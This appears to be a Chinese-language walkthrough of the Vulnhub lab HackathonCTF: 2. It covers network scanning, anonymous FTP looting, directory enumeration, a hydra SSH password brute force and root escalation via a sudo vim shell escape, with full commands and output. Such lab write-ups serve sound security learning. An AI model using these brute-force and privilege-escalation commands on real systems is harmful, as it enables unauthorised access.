Vulnhub之Hackathon 2靶机详细解题过程
Hackathon 2
作者: jason_huawen
靶机基本信息
名称:HackathonCTF: 2
地址:https://www.vulnhub.com/entry/hackathonctf-2,714/
识别目标主机IP地址
由于目标主机无法从Virtualbox自动获取IP地址,参照本人另文解决该问题,然后继续执行下面的过程。
──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.88.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:f0:cf:82 1 60 PCS Systemtechnik GmbH
192.168.56.208 08:00:27:57:0d:35 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.208
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.208 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 02:52 EST
Nmap scan report for bogon (192.168.56.208)
Host is up (0.00025s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 1000 1000 47 Jun 18 2021 flag1.txt
|_-rw-r--r-- 1 1000 1000 849 Jun 19 2021 word.dir
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_*/
|_http-title: hackathon2
|_http-server-header: Apache/2.4.41 (Ubuntu)
7223/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 70:4a:a9:69:c2:d1:68:23:86:bd:85:83:31:ca:80:0c (RSA)
| 256 a6:9e:a4:18:ad:a4:2b:7e:ea:f8:5e:63:29:6e:4f:24 (ECDSA)
|_ 256 4e:db:a6:d2:eb:b9:53:a5:d7:21:0b:4e:57:a5:f5:c1 (ED25519)
MAC Address: 08:00:27:57:0D:35 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.47 seconds
NMAP扫描结果表明目标主机有3个开放端口21(FTP)、80(HTTP)以及7223(SSH)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ ftp 192.168.56.208
Connected to 192.168.56.208.
220 (vsFTPd 3.0.3)
Name (192.168.56.208:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||13877|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 118 4096 Jun 19 2021 .
drwxr-xr-x 2 0 118 4096 Jun 19 2021 ..
-rw-r--r-- 1 1000 1000 47 Jun 18 2021 flag1.txt
-rw-r--r-- 1 1000 1000 849 Jun 19 2021 word.dir
226 Directory send OK.
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
229 Entering Extended Passive Mode (|||45756|)
150 Opening BINARY mode data connection for flag1.txt (47 bytes).
100% |********************************| 47 51.86 KiB/s 00:00 ETA
226 Transfer complete.
47 bytes received in 00:00 (32.29 KiB/s)
ftp> get word.dir
local: word.dir remote: word.dir
229 Entering Extended Passive Mode (|||12119|)
150 Opening BINARY mode data connection for word.dir (849 bytes).
100% |********************************| 849 1.53 MiB/s 00:00 ETA
226 Transfer complete.
849 bytes received in 00:00 (945.38 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ cat flag1.txt
₣Ⱡ₳₲{7e3c118631b68d159d9399bda66fc684}
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ cat word.dir
happy
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
...
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
这应该是密码字典,或者是目录字典?。
接下来看一下端口80:
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ curl http://192.168.56.208
<!DOCTYPE html>
<html>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous"></head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<style>
img {
display: block;
margin-left: auto;
margin-right: auto;
width:30%;
}
td{
display: block;
}
h1{
text-align: center;
}
</style>
<head>
<title>hackathon2</title>
</head>
<body>
<table>
<br><br><br><br>
<tr class=" ">
<img src="img1.png" alt="image1">
<h1>@nohtakcah</h1>
</tr>
<br><br><br>
<td>
<i class="fab fa-twitter"><a href="https://twitter.com/Markme_1">doBash</a></i>
</td>
<td>
<i class="fab fa-twitter"><a href="https://twitter.com/The_NIL_is_here">The_TurtleHermit</a></i>
</td>
</table>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ curl http://192.168.56.208/robots.txt
user-agent:*
disallow: */
user-agent:*
disallow: */
user-agent:*
──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.208
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/22 03:05:10 Starting gobuster in directory enumeration mode
===============================================================
/happy (Status: 200) [Size: 110]
/server-status (Status: 403) [Size: 279]
Progress: 213848 / 220561 (96.96%)===============================================================
2022/11/22 03:05:26 Finished
==============================================================
Gobuster工具发现了happy目录,访问该目录:
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ curl http://192.168.56.208/happy
<html>
<title>happy</title>
<body><h1> Nothing is in here</h1></body>
<!-- username: hackathonll >
</html>
返回页面源代码中有注释,这应该是用户名,试一试结合前面得到的密码字典用hydra工具进行爆破:
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ hydra -l hackathonll -P word.dir ssh://192.168.56.208:7223
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-22 03:09:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 110 login tries (l:1/p:110), ~7 tries per task
[DATA] attacking ssh://192.168.56.208:7223/
[7223][ssh] host: 192.168.56.208 login: hackathonll password: Ti@gO
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-22 03:09:15
成功得到了密码,那么SSH登录目标主机。
┌──(kali㉿kali)-[~/Vulnhub/Hackathon2]
└─$ ssh hackathonll@192.168.56.208 -p 7223
The authenticity of host '[192.168.56.208]:7223 ([192.168.56.208]:7223)' can't be established.
ED25519 key fingerprint is SHA256:kVyS5RqS8tFczs71LETg90vnsj/ZLDrqbn91uPP1Cik.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.208]:7223' (ED25519) to the list of known hosts.
hackathonll@192.168.56.208's password:
Permission denied, please try again.
hackathonll@192.168.56.208's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-74-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 22 Nov 2022 04:11:10 PM UTC
System load: 0.0 Processes: 184
Usage of /: 23.3% of 18.57GB Users logged in: 0
Memory usage: 13% IPv4 address for enp0s17: 192.168.56.208
Swap usage: 0%
67 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jun 19 05:35:15 2021 from 10.0.0.110
$ id
uid=1001(hackathonll) gid=1001(hackathonll) groups=1001(hackathonll)
$ pwd
/home/hackathonll
$ ls -alh
total 28K
drwxr-xr-x 3 hackathonll hackathonll 4.0K Jun 18 2021 .
drwxr-xr-x 4 root root 4.0K Jun 18 2021 ..
-rw------- 1 hackathonll hackathonll 43 Jun 18 2021 .bash_history
-rw-r--r-- 1 hackathonll hackathonll 220 Jun 18 2021 .bash_logout
-rw-r--r-- 1 hackathonll hackathonll 3.7K Jun 18 2021 .bashrc
drwx------ 2 hackathonll hackathonll 4.0K Jun 18 2021 .cache
-rw-r--r-- 1 hackathonll hackathonll 807 Jun 18 2021 .profile
$ cat .bash_history
ls
sudo -i
sudo -l
sudo -i
sudo -l
sudo -i
$
提权
$ sudo -l
Matching Defaults entries for hackathonll on hackathon:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hackathonll may run the following commands on hackathon:
(root) NOPASSWD: /usr/bin/vim
$
$ sudo /usr/bin/vim -c ':!/bin/sh'
# cd /root
# ls -alh
total 36K
drwx------ 5 root root 4.0K Jun 18 2021 .
drwxr-xr-x 20 root root 4.0K Jun 18 2021 ..
-rw------- 1 root root 2.4K Jun 19 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 47 Jun 18 2021 flag2.txt
drwxr-xr-x 3 root root 4.0K Jun 18 2021 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
drwxr-xr-x 3 root root 4.0K Jun 18 2021 snap
drwx------ 2 root root 4.0K Jun 18 2021 .ssh
# cat flag2.txt
₣Ⱡ₳₲{7e3c118631b68d159d9399bda66fc694}
#
成功提权!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
